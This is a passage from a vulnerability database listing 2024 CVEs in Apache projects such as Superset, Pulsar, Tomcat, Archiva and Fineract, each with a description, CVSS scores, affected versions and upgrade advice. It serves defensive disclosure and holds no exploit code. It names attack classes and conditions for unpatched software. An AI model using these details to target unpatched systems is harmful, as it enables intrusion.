nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 9.0.0
CVE-2024-21742

Improper input validation allows for header injection in MIME4J library when using MIME4J DOM for composing message. This can be exploited by an attacker to add unintended headers to MIME messages.

Products Affected

Vendor Product Version
apache james_mime4j *
CVE-2024-22281

** UNSUPPORTED WHEN ASSIGNED ** The Apache Helix Front (UI) component contained a hard-coded secret, allowing an attacker to spoof sessions by generating their own fake cookies. This issue affects Apache Helix Front (UI): all versions. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache helix *
CVE-2024-22371

Exposure of sensitive data by by crafting a malicious EventFactory and providing a custom ExchangeCreatedEvent that exposes sensitive data. Vulnerability in Apache Camel.This issue affects Apache Camel: from 3.21.X through 3.21.3, from 3.22.X through 3.22.0, from 4.0.X through 4.0.3, from 4.X through 4.3.0. Users are recommended to upgrade to version 3.21.4, 3.22.1, 4.0.4 or 4.4.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 2.9 LOW CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N 1.4 1.4

Products Affected

Vendor Product Version
apache camel *
apache camel 3.22.0
CVE-2024-22393

Unrestricted Upload of File with Dangerous Type vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. Pixel Flood Attack by uploading large pixel files will cause server out of memory. A logged-in user can cause such an attack by uploading an image when posting content. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-22399

Deserialization of Untrusted Data vulnerability in Apache Seata.  When developers disable authentication on the Seata-Server and do not use the Seata client SDK dependencies, they may construct uncontrolled serialized malicious requests by directly sending bytecode based on the Seata private protocol. This issue affects Apache Seata: 2.0.0, from 1.0.0 through 1.8.0. Users are recommended to upgrade to version 2.1.0/1.8.1, which fixes the issue.

Products Affected

Vendor Product Version
apache seata *
apache seata 2.0.0
CVE-2024-23321

For RocketMQ versions 5.2.0 and below, under certain conditions, there is a risk of exposure of sensitive Information to an unauthorized actor even if RocketMQ is enabled with authentication and authorization functions. An attacker, possessing regular user privileges or listed in the IP whitelist, could potentially acquire the administrator's account and password through specific interfaces. Such an action would grant them full control over RocketMQ, provided they have access to the broker IP address list. To mitigate these security threats, it is strongly advised that users upgrade to version 5.3.0 or newer. Additionally, we recommend users to use RocketMQ ACL 2.0 instead of the original RocketMQ ACL when upgrading to version Apache RocketMQ 5.3.0.

Products Affected

Vendor Product Version
apache rocketmq *
CVE-2024-23349

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. XSS attack when user enters summary. A logged-in user, when modifying their own submitted question, can input malicious code in the summary to create such an attack. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-23452

Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request. Vulnerability Cause Description: The http_parser does not comply with the RFC-7230 HTTP 1.1 specification. Attack scenario: If a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting. One particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server.  Solution: You can choose one solution from below: 1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch:  https://github.com/apache/brpc/pull/2518

Products Affected

Vendor Product Version
apache brpc *
CVE-2024-23454

Apache Hadoop’s RunJar.run() does not set permissions for temporary directory by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.

Products Affected

Vendor Product Version
apache hadoop *
CVE-2024-23537

Improper Privilege Management vulnerability in Apache Fineract.This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.9.0, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L 1.8 6.0

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23538

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Fineract.This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.8.5 or 1.9.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 9.9 CRITICAL CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L 3.1 6.0

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23539

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Apache Fineract.This issue affects Apache Fineract: <1.8.5. Users are recommended to upgrade to version 1.8.5 or 1.9.0, which fix the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.3 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H 2.8 5.5

Products Affected

Vendor Product Version
apache fineract *
CVE-2024-23590

Session Fixation vulnerability in Apache Kylin. This issue affects Apache Kylin: from 2.0.0 through 4.x. Users are recommended to upgrade to version 5.0.0 or above, which fixes the issue.

Products Affected

Vendor Product Version
apache kylin *
CVE-2024-23672

Denial of Service via incomplete cleanup vulnerability in Apache Tomcat. It was possible for WebSocket clients to keep WebSocket connections open leading to increased resource consumption.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-23673

Malicious code execution via path traversal in Apache Software Foundation Apache Sling Servlets Resolver.This issue affects all version of Apache Sling Servlets Resolver before 2.11.0. However, whether a system is vulnerable to this attack depends on the exact configuration of the system. If the system is vulnerable, a user with write access to the repository might be able to trick the Sling Servlet Resolver to load a previously uploaded script.  Users are recommended to upgrade to version 2.11.0, which fixes this issue. It is recommended to upgrade, regardless of whether your system configuration currently allows this attack or not.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H 1.6 5.9

Products Affected

Vendor Product Version
apache sling_servlets_resolver *
CVE-2024-23807

The Apache Xerces C++ XML parser on versions 3.0.0 before 3.2.5 contains a use-after-free error triggered during the scanning of external DTDs. Users are recommended to upgrade to version 3.2.5 which fixes the issue, or mitigate the issue by disabling DTD processing. This can be accomplished via the DOM using a standard parser feature, or via SAX using the XERCES_DISABLE_DTD environment variable. This issue has been disclosed before as CVE-2018-1311, but unfortunately that advisory incorrectly stated the issue would be fixed in version 3.2.3 or 3.2.4.

Products Affected

Vendor Product Version
apache xerces-c++ *
CVE-2024-23944

Information disclosure in persistent watchers handling in Apache ZooKeeper due to missing ACL check. It allows an attacker to monitor child znodes by attaching a persistent watcher (addWatch command) to a parent which the attacker has already access to. ZooKeeper server doesn't do ACL check when the persistent watcher is triggered and as a consequence, the full path of znodes that a watch event gets triggered upon is exposed to the owner of the watcher. It's important to note that only the path is exposed by this vulnerability, not the data of znode, but since znode path can contain sensitive information like user name or login ID, this issue is potentially critical. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.

Products Affected

Vendor Product Version
apache zookeeper *
CVE-2024-23945

Signing cookies is an application security feature that adds a digital signature to cookie data to verify its authenticity and integrity. The signature helps prevent malicious actors from modifying the cookie value, which can lead to security vulnerabilities and exploitation. Apache Hive’s service component accidentally exposes the signed cookie to the end user when there is a mismatch in signature between the current and expected cookie. Exposing the correct cookie signature can lead to further exploitation. The vulnerable CookieSigner logic was introduced in Apache Hive by HIVE-9710 (1.2.0) and in Apache Spark by SPARK-14987 (2.0.0). The affected components are the following: * org.apache.hive:hive-service * org.apache.spark:spark-hive-thriftserver_2.11 * org.apache.spark:spark-hive-thriftserver_2.12

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.9 MEDIUM CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N 2.2 3.6

Products Affected

Vendor Product Version
apache hive *
apache spark 3.5.0
apache spark *
CVE-2024-23946

Possible path traversal in Apache OFBiz allowing file inclusion. Users are recommended to upgrade to version 18.12.12, that fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-23952

This is a duplicate for CVE-2023-46104. With correct CVE version ranges for affected Apache Superset. Uncontrolled resource consumption can be triggered by authenticated attacker that uploads a malicious ZIP to import database, dashboards or datasets.   This vulnerability exists in Apache Superset versions up to and including 2.1.2 and versions 3.0.0, 3.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H 2.8 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-23953

Use of Arrays.equals() in LlapSignerImpl in Apache Hive to compare message signatures allows attacker to forge a valid signature for an arbitrary message byte by byte. The attacker should be an authorized user of the product to perform this attack. Users are recommended to upgrade to version 4.0.0, which fixes this issue. The problem occurs when an application doesn’t use a constant-time algorithm for validating a signature. The method Arrays.equals() returns false right away when it sees that one of the input’s bytes are different. It means that the comparison time depends on the contents of the arrays. This little thing may allow an attacker to forge a valid signature for an arbitrary message byte by byte. So it might allow malicious users to submit splits/work with selected signatures to LLAP without running as a privileged user, potentially leading to DDoS attack. More details in the reference section.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2024-24549

Denial of Service due to improper input validation vulnerability for HTTP/2 requests in Apache Tomcat. When processing an HTTP/2 request, if the request exceeded any of the configured limits for headers, the associated HTTP/2 stream was not reset until after all of the headers had been processed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M16, from 10.1.0-M1 through 10.1.18, from 9.0.0-M1 through 9.0.85, from 8.5.0 through 8.5.98. Other, older, EOL versions may also be affected. Users are recommended to upgrade to version 11.0.0-M17, 10.1.19, 9.0.86 or 8.5.99 which fix the issue.

Products Affected

Vendor Product Version
apache tomcat *
apache tomcat 11.0.0
debian debian_linux 10.0
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-24683

Improper Input Validation vulnerability in Apache Hop Engine.This issue affects Apache Hop Engine: before 2.8.0. Users are recommended to upgrade to version 2.8.0, which fixes the issue. When Hop Server writes links to the PrepareExecutionPipelineServlet page one of the parameters provided to the user was not properly escaped. The variable not properly escaped is the "id", which is not directly accessible by users creating pipelines making the risk of exploiting this low. This issue only affects users using the Hop Server component and does not directly affect the client.

Products Affected

Vendor Product Version
apache hop_engine *
CVE-2024-24746

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache NimBLE.  Specially crafted GATT operation can cause infinite loop in GATT server leading to denial of service in Bluetooth stack or device. This issue affects Apache NimBLE: through 1.6.0. Users are recommended to upgrade to version 1.7.0, which fixes the issue.

Products Affected

Vendor Product Version
apache nimble *
CVE-2024-24772

A guest user could exploit a chart data REST API and send arbitrary SQL statements that on error could leak information from the underlying analytics database.This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24773

Improper parsing of nested SQL statements on SQLLab would allow authenticated users to surpass their data authorization scope. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.9 MEDIUM CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 1.2 3.6

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24778

Improper privilege management in a REST interface allowed registered users to access unauthorized resources if the resource ID was know. This issue affects Apache StreamPipes: through 0.95.1. Users are recommended to upgrade to version 0.97.0 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 6.5 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 2.8 3.6

Products Affected

Vendor Product Version
apache streampipes *
CVE-2024-24779

Apache Superset with custom roles that include `can write on dataset` and without all data access permissions, allows for users to create virtual datasets to data they don't have access to. These users could then use those virtual datasets to get access to unauthorized data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 5.0 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N 3.1 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-24780

Remote Code Execution with untrusted URI of UDF vulnerability in Apache IoTDB. The attacker who has privilege to create UDF can register malicious function from untrusted URI. This issue affects Apache IoTDB: from 1.0.0 before 1.3.4. Users are recommended to upgrade to version 1.3.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

Products Affected

Vendor Product Version
apache iotdb *
CVE-2024-24795

HTTP Response splitting in multiple modules in Apache HTTP Server allows an attacker that can inject malicious response headers into backend applications to cause an HTTP desynchronization attack. Users are recommended to upgrade to version 2.4.59, which fixes this issue.

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
apple macos *
broadcom fabric_operating_system -
debian debian_linux 10.0
fedoraproject fedora 39
netapp ontap_tools 10
fedoraproject fedora 40
CVE-2024-25065

Possible path traversal in Apache OFBiz allowing authentication bypass. Users are recommended to upgrade to version 18.12.12, that fixes the issue.

Products Affected

Vendor Product Version
apache ofbiz *
CVE-2024-25090

Insufficient input validation and sanitation in Profile name & screenname, Bookmark name & description and blogroll name features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.3. This issue affects Apache Roller: from 5.0.0 before 6.1.3. Users are recommended to upgrade to version 6.1.3, which fixes the issue.

Products Affected

Vendor Product Version
apache roller *
CVE-2024-25141

When ssl was enabled for Mongo Hook, default settings included "allow_insecure" which caused that certificates were not validated. This was unexpected and undocumented. Users are recommended to upgrade to version 4.0.0, which fixes this issue.

Products Affected

Vendor Product Version
apache apache-airflow-providers-mongo *
CVE-2024-25142

Use of Web Browser Cache Containing Sensitive Information vulnerability in Apache Airflow.  Airflow did not return "Cache-Control" header for dynamic content, which in case of some browsers could result in potentially storing sensitive data in local cache of the browser. This issue affects Apache Airflow: before 2.9.2. Users are recommended to upgrade to version 2.9.2, which fixes the issue.

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-25710

Loop with Unreachable Exit Condition ('Infinite Loop') vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.3 through 1.25.0. Users are recommended to upgrade to version 1.26.0 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.1 HIGH CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H 1.4 6.0

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2024-26016

A low privilege authenticated user could import an existing dashboard or chart that they do not have access to and then modify its metadata, thereby gaining ownership of the object. However, it's important to note that access to the analytical data of these charts and dashboards would still be subject to validation based on data access privileges. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1.Users are recommended to upgrade to version 3.1.1, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-26280

Apache Airflow, versions before 2.8.2, has a vulnerability that allows authenticated Ops and Viewers users to view all information on audit logs, including dag names and usernames they were not permitted to view. With 2.8.2 and newer, Ops and Viewer users do not have audit log permission by default, they need to be explicitly granted permissions to see the logs. Only admin users have audit log permission by default. Users of Apache Airflow are recommended to upgrade to version 2.8.2 or newer to mitigate the risk associated with this vulnerability

Products Affected

Vendor Product Version
apache airflow *
CVE-2024-26307

Possible race condition vulnerability in Apache Doris. Some of code using `chmod()` method. This method run the risk of someone renaming the file out from under user and chmodding the wrong file. This could theoretically happen, but the impact would be minimal. This issue affects Apache Doris: before 1.2.8, before 2.0.4. Users are recommended to upgrade to version 2.0.4, which fixes the issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2024-26308

Allocation of Resources Without Limits or Throttling vulnerability in Apache Commons Compress.This issue affects Apache Commons Compress: from 1.21 before 1.26. Users are recommended to upgrade to version 1.26, which fixes the issue.

Products Affected

Vendor Product Version
apache commons_compress *
CVE-2024-26578

Concurrent Execution using Shared Resource with Improper Synchronization ('Race Condition') vulnerability in Apache Answer.This issue affects Apache Answer: through 1.2.1. Repeated submission during registration resulted in the registration of the same user. When users register, if they rapidly submit multiple registrations using scripts, it can result in the creation of multiple user accounts simultaneously with the same name. Users are recommended to upgrade to version [1.2.5], which fixes the issue.

Products Affected

Vendor Product Version
apache answer *
CVE-2024-26579

Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.7.0 through 1.11.0,  the attackers can bypass using malicious parameters. Users are advised to upgrade to Apache InLong's 1.12.0 or cherry-pick [1], [2] to solve it. [1] https://github.com/apache/inlong/pull/9694 [2]  https://github.com/apache/inlong/pull/9707

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-26580

Deserialization of Untrusted Data vulnerability in Apache InLong.This issue affects Apache InLong: from 1.8.0 through 1.10.0, the attackers can use the specific payload to read from an arbitrary file. Users are advised to upgrade to Apache InLong's 1.11.0 or cherry-pick [1] to solve it. [1] https://github.com/apache/inlong/pull/9673

Products Affected

Vendor Product Version
apache inlong *
CVE-2024-27135

Improper input validation in the Pulsar Function Worker allows a malicious authenticated user to execute arbitrary Java code on the Pulsar Function worker, outside of the sandboxes designated for running user-provided functions. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.5 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27136

XSS in Upload page in Apache JSPWiki 2.12.1 and priors allows the attacker to execute javascript in the victim's browser and get some sensitive information about the victim. Apache JSPWiki users should upgrade to 2.12.2 or later.

Products Affected

Vendor Product Version
apache jspwiki *
CVE-2024-27137

In Apache Cassandra it is possible for a local attacker without access to the Apache Cassandra process or configuration files to manipulate the RMI registry to perform a man-in-the-middle attack and capture user names and passwords used to access the JMX interface. The attacker can then use these credentials to access the JMX interface and perform unauthorized operations. This is same vulnerability that CVE-2020-13946 was issued for, but the Java option was changed in JDK10. This issue affects Apache Cassandra from 4.0.2 through 5.0.2 running Java 11. Operators are recommended to upgrade to a release equal to or later than 4.0.15, 4.1.8, or 5.0.3 which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 5.3 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 1.8 3.4

Products Affected

Vendor Product Version
apache cassandra 5.0.0
apache cassandra *
CVE-2024-27138

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva. Apache Archiva has a setting to disable user registration, however this restriction can be bypassed. As Apache Archiva has been retired, we do not expect to release a version of Apache Archiva that fixes this issue. You are recommended to look into migrating to a different solution, or isolate your instance from any untrusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27139

** UNSUPPORTED WHEN ASSIGNED ** Incorrect Authorization vulnerability in Apache Archiva: a vulnerability in Apache Archiva allows an unauthenticated attacker to modify account data, potentially leading to account takeover. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27140

** UNSUPPORTED WHEN ASSIGNED ** Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache Archiva. This issue affects Apache Archiva: from 2.0.0. As this project is retired, we do not plan to release a version that fixes this issue. Users are recommended to find an alternative or restrict access to the instance to trusted users. Alternatively, you could configure a HTTP proxy in front of your Archiva instance to only forward requests that do not have malicious characters in the URL. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

Products Affected

Vendor Product Version
apache archiva *
CVE-2024-27181

In Apache Linkis <= 1.5.0, Privilege Escalation in Basic management services where the attacking user is a trusted account allows access to Linkis's Token information. Users are advised to upgrade to version 1.6.0, which fixes this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
134c704f-9b21-4f2e-91b3-4a467353bcc0 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-27182

In Apache Linkis <= 1.5.0, Arbitrary file deletion in Basic management services on A user with an administrator account could delete any file accessible by the Linkis system user . Users are recommended to upgrade to version 1.6.0, which fixes this issue.

Products Affected

Vendor Product Version
apache linkis *
CVE-2024-27309

While an Apache Kafka cluster is being migrated from ZooKeeper mode to KRaft mode, in some cases ACLs will not be correctly enforced. Two preconditions are needed to trigger the bug: 1. The administrator decides to remove an ACL 2. The resource associated with the removed ACL continues to have two or more other ACLs associated with it after the removal. When those two preconditions are met, Kafka will treat the resource as if it had only one ACL associated with it after the removal, rather than the two or more that would be correct. The incorrect condition is cleared by removing all brokers in ZK mode, or by adding a new ACL to the affected resource. Once the migration is completed, there is no metadata loss (the ACLs all remain). The full impact depends on the ACLs in use. If only ALLOW ACLs were configured during the migration, the impact would be limited to availability impact. if DENY ACLs were configured, the impact could include confidentiality and integrity impact depending on the ACLs configured, as the DENY ACLs might be ignored due to this vulnerability during the migration period.

Products Affected

Vendor Product Version
apache kafka *
CVE-2024-27315

An authenticated user with privileges to create Alerts on Alerts & Reports has the capability to generate a specially crafted SQL statement that triggers an error on the database. This error is not properly handled by Apache Superset and may inadvertently surface in the error log of the Alert exposing possibly sensitive data. This issue affects Apache Superset: before 3.0.4, from 3.1.0 before 3.1.1. Users are recommended to upgrade to version 3.1.1 or 3.0.4, which fixes the issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 4.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N 2.8 1.4

Products Affected

Vendor Product Version
apache superset *
CVE-2024-27316

HTTP/2 incoming headers exceeding the limit are temporarily buffered in nghttp2 in order to generate an informative HTTP 413 response. If a client does not stop sending headers, this leads to memory exhaustion.

Products Affected

Vendor Product Version
apache http_server *
fedoraproject fedora 38
netapp ontap 9
fedoraproject fedora 39
fedoraproject fedora 40
CVE-2024-27317

In Pulsar Functions Worker, authenticated users can upload functions in jar or nar files. These files, essentially zip files, are extracted by the Functions Worker. However, if a malicious file is uploaded, it could exploit a directory traversal vulnerability. This occurs when the filenames in the zip files, which aren't properly validated, contain special elements like "..", altering the directory path. This could allow an attacker to create or modify files outside of the designated extraction directory, potentially influencing system behavior. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
security@apache.org 8.4 HIGH CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:L 1.8 6.0

Products Affected

Vendor Product Version
apache pulsar *
apache pulsar 3.2.0
CVE-2024-27347

Server-Side Request Forgery (SSRF) vulnerability in Apache HugeGraph-Hubble.This issue affects Apache HugeGraph-Hubble: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph-hubble *
CVE-2024-27348

RCE-Remote Command Execution vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0 in Java8 & Java11 Users are recommended to upgrade to version 1.3.0 with Java11 & enable the Auth system, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-27349

Authentication Bypass by Spoofing vulnerability in Apache HugeGraph-Server.This issue affects Apache HugeGraph-Server: from 1.0.0 before 1.3.0. Users are recommended to upgrade to version 1.3.0, which fixes the issue.

Products Affected

Vendor Product Version
apache hugegraph *
CVE-2024-27438

Download of Code Without Integrity Check vulnerability in Apache Doris. The jdbc driver files used for JDBC catalog is not checked and may resulting in remote command execution. Once the attacker is authorized to create a JDBC catalog, he/she can use arbitrary driver jar file with unchecked code snippet. This code snippet will be run when catalog is initializing without any check. This issue affects Apache Doris: from 1.2.0 through 2.0.4. Users are recommended to upgrade to version 2.0.5 or 2.1.x, which fixes the issue.

Products Affected

Vendor Product Version
apache doris *
CVE-2024-27439

An error in the evaluation of the fetch metadata headers could allow a bypass of the CSRF protection in Apache Wicket. This issue affects Apache Wicket: from 9.1.0 through 9.16.0, and the milestone releases for the 10.0 series. Apache Wicket 8.x does not support CSRF protection via the fetch metadata headers and as such is not affected. Users are recommended to upgrade to version 9.17.0 or 10.0.0, which fixes the issue.

Products Affected

Vendor Product Version
apache wicket 10.0.0
apache wicket *
CVE-2024-27894

The Pulsar Functions Worker includes a capability that permits authenticated users to create functions where the function's implementation is referenced by a URL. The supported URL schemes include "file", "http", and "https". When a function is created using this method, the Functions Worker will retrieve the implementation from the URL provided by the user. However, this feature introduces a vulnerability that can be exploited by an attacker to gain unauthorized access to any file that the Pulsar Functions Worker process has permissions to read. This includes reading the process environment which potentially includes sensitive information, such as secrets. Furthermore, an attacker could leverage this vulnerability to use the Pulsar Functions Worker as a proxy to access the content of remote HTTP and HTTPS endpoint URLs. This could also be used to carry out denial of service attacks. This vulnerability also applies to the Pulsar Broker when it is configured with "functionsWorkerEnabled=true". This issue affects Apache Pulsar versions from 2.4.0 to 2.10.5, from 2.11.0 to 2.11.3, from 3.0.0 to 3.0.2, from 3.1.0 to 3.1.2, and 3.2.0. 2.10 Pulsar Function Worker users should upgrade to at least 2.10.6. 2.11 Pulsar Function Worker users should upgrade to at least 2.11.4. 3.0 Pulsar Function Worker users should upgrade to at least 3.0.3. 3.1 Pulsar Function Worker users should upgrade to at least 3.1.3. 3.2 Pulsar Function Worker users should upgrade to at least 3.2.1. Users operating versions prior to those listed above should upgrade to the aforementioned patched versions or newer versions. The updated versions of Pulsar Functions Worker will, by default, impose restrictions on the creation of functions using URLs. For users who rely on this functionality, the Function Worker configuration provides two configuration keys: "additionalEnabledConnectorUrlPatterns" and "additionalEnabledFunctionsUrlPatterns". These keys allow users to specify a set of URL patterns that are 